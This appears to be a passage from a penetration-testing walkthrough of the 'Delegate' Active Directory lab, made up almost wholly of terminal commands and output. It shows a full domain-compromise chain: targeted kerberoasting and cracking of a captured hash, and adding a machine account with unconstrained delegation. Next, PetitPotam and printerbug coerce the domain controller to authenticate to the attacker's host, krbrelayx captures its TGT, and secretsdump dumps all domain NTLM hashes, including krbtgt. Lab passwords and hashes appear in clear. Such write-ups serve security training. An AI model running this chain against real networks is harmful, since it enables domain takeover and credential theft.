INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

Upload data to Bloodhound, we find

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

a new tool ( dnstool , printerbug )

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

new tools ( bloodyad.py , addspn.py & PetitPotam.py)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below the bloodyAD installed in Python Virtual Enviroment (  i had troubles with dependicies)

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using powermad & printerbug

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 

setup the listener ( waiting for connection then)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

start printerbug

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

use impacket-secrectsdump to get the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

.

What a ride.